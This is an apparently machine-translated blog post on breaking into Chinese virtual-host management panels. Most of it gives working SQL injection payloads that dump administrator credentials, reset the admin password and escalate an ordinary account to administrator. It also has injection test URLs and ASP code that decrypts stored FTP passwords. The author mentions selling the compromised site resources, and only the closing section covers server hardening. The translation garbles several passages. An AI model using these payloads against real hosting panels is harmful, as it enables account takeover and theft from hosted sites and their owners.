Analysis of IDC virtual host security and Influencing Factors

At present, most webmasters use virtual hosts, while IDC service providers in China are uneven, and there are many security differences. Most IDCs use virtual host management software. After you install and complete the settings, an IDC website, including the overall service, will be ready. Therefore, all security measures are automatically set by the software. The benefits of such software are obvious, convenient, and manual intervention is not required. However, once the software has vulnerabilities, all the sites on the server will suffer. Many IDC service providers, due to the large number of servers, will not patch each machine even if there are some vulnerabilities.

I have detected the server where the site is located. I mainly use the following virtual host management software:

Bytes -------------------------------------------------------------------------------------------
External host Management System

Currently, this is used in 70% of domestic space, once known as bt's permission setting, but recently Out-Of-The-stars chrysanthemums have been cracked in 70%. So far, the official website has fixed the vulnerability and there is basically no writable directory. the depressing thing is net's horse. you only need to execute cmd iispy to directly report an error to the Registry and set the relevant permissions. The previous usage methods are not mentioned here. Bt started again outside the stars.

 

Huazhong virtual host Management System

This is used by 50% of domestic space vendors, and the latest version of hzhost is 6.5. The Management page of this version has a severe SQL injection vulnerability, allowing you to modify the background password of a VM. The program domain/login. asp does not effectively filter user-submitted parameters, leading to the SQL injection vulnerability.

Select domain name management and enter the test statement in the domain name input box. How can we determine whether a vulnerability exists? Enter the sectop password. MSSQL databases are exposed.

Blow the administrator password first: sectop and (select top 1 isnull (cast ([u_nme] as nvarchar (4000), char (32) + char (94) + isnull (cast ([U_pss] as nvarchar (4000), char (32) from (select top 2u_nme, U_pss from [hzhost] .. [memlst] where 1 = 1 order by [u_nme]) t order by [u_nme] desc)> 0 -- and '1' = '1

The password is encrypted by MD5. You can decrypt it on various major decryption websites. If the password settings are complex, the password cannot be cracked in a short time. We can change the management password. Please change it back after use. Statement: sectop 'Update [memlst] SET u_pss = 'xxxxxxxx' WHERE u_nme = 'admin' -- this statement is used to change the administrator password to xxxxxxx. We can also escalate the self-Registered General Account to administrator privileges., register at the front-end.
Statement:
Sectop 'Update [memlst] SET u_sys = 6 WHERE u_nme = 'your registered username '--
Sectop 'Update [memlst] SET u_pwr = 2 WHERE u_nme = 'user name you registered '--
You can submit the above two statements to escalate your permissions to the Administrator. After submission, you can log on to the console and go to the Management page, or directly log on to the background address.

In the background, you can add money and enable domain names and spaces for yourself. This vulnerability is very dangerous.
Bytes -------------------------------------------------------------------------------------------
Elastic virtual host Management Software
Http://www.bkjia.com/Pdt_List.asp? Sort = EM'
Http://www.bkjia.com/Pdt_List.asp? Sort = EM 'and '1' = '1
Returns normal.
The injection exists.
Detection with NBSI:

Note:

Add feature characters
Data cannot be detected using the D injection tool.
Only NBSI or manual injection is allowed. Administrator table: EfangAdmin

The password is encrypted.
It's similar to MD5...

The random name of the web directory of Yifang's host system is depressing, but the path can be obtained across sites.
Bytes -------------------------------------------------------------------------------------------
Blue mans virtual host Management System

The problem lies in Scripts/agent/Combine/buy. on the asp file, strSQL = "Select. *, B. STName from v_ProdInfo a, T_DNS_ServiceType B where. STCode = B. STCode

And a. ProdCode = '"& Request (" ID ") &"' and a. ProdStat <> '3 '"
Set Rs = Server. CreateObject ("ADODB. Recordset ")
Rs. open strSQL, Cn, 1, 1
If Rs. Eof Then
Response. Write "<br> <p align = 'center'> unable to purchase this product </p>"
Rs. Close
Cn. Close
Call PrintPageBottom
Response. End
End if
You can easily see that the id variable has not been processed since the request and is directly placed in the query statement. then there is a very simple injection vulnerability. if you want to test it on a blue-mans site, you must first register a user and log on to it. then go to the business application, and check the domain name registration. Place the cursor over the "details" link of a product and record its ProdCode value. here I am com (like http://www.bkjia.com/scripts/agent/ProductInfo.asp? ProdCode = com), but it seems that many sites are digital, for example, 101. We changed it as needed. Then we constructed the injection statement.

Http://www.bkjia.com/Scripts/agent/Combine/buy.asp? Id = com 'and 1 = 1 --
Http://www.bkjia.com/Scripts/agent/Combine/buy.asp? Id = com 'and 1 = 2 --

Finally, I guess the password 941CFBCF40B96B8169CEC930976FEC00, it is difficult to find that the management of virtual hosts is a link can be ftp login, such as ftp: // user: password@202.99.12.25, however, I can see that this password is used in the data table. that is to say, the blue mans used reversible algorithms for the password. so I ran back to view the code and finally found the decoded function. however, because it is written in components, you do not have to understand its encryption algorithm. however, you still need to know the password.

<%
Password = "25E41385F01E381944F0646AE44187AA"
Set aspvdf = Server. CreateObject ("BlueEncrypt. Decode ")
%>
The password is <% = aspvdf. DeStr (password) %>
Replace the password value, and the password will come out ~~~

Bytes -------------------------------------------------------------------------------------------
Although the integrated virtual host software is easy to manage, once vulnerabilities occur, security is also obvious. If manual management is adopted, security is strictly set, and security is much stronger than other software.

However, I found that there are only a few servers that are manually configured, which leads to the fact that sometimes I get the permissions of the entire server after the target site, and the resources of all sites are available, A single site sells hundreds of dollars, but some small sites are not very easy to sell, the price is a little lower, and it is also good to sell plug-ins to traffic vendors.

With so many vulnerabilities in the VM management system, some friends may be interested in Configuring Secure VM instances. In fact, security is a whole, many security configurations are included in the details.

Let's talk about two platforms respectively:

The first is win. The general architecture is IIS + asp + aspx + php + mysql + mssql. The jspspace is IIS + tomcat + jdk (some spaces are also used for jboss, but tomcat is mostly used)
In IIS, each site uses an independent user guests group and sets permissions for the root directory and IIS connection account separately. To run aspx, you must also join the IIS_WPG group and use an independent process pool, start the process account with an independent user. To delete unnecessary extended mappings, such as asa and cer, you should also create an extended mdb ing to prevent access databases from being downloaded. Database for mssql, use the public permission to connect, otherwise db_owner connection as long as you know the website path, backing up a sentence is quite easy. For mysql, grant is used to grant permissions to users and databases. Do not use the root account. Strictly wait until the cms is installed (for example, create table or other operations may exist during installation), and only insert is used, delete, update, and select permissions. The system must delete dangerous components, such as wscript and disk permissions, to prevent cross-directory operations.

As for the architecture of IIS + tomcat + jdk, you must note that after tomcat is installed, you must create a low-Permission user and set tomcat to run with a low-permission account in the service; otherwise, a shell, the server will suffer.

The second is linux. The general architecture is apache + mysql + php (some foreign IDCs use nginx or lighthttpd for webserver). apache should use php_admin_value open_basedir to restrict cross-directory browsing. php. in ini, note that display_errors should be set to Off. Otherwise, the web path may be exposed. In addition, disable_functions must block dangerous functions such as system and exec. apache can create a separate user to run the function. mysql can write shell scripts, daily or weekly backup. Some services such as FTP and SSH use SSL whenever possible to prevent sniffing by others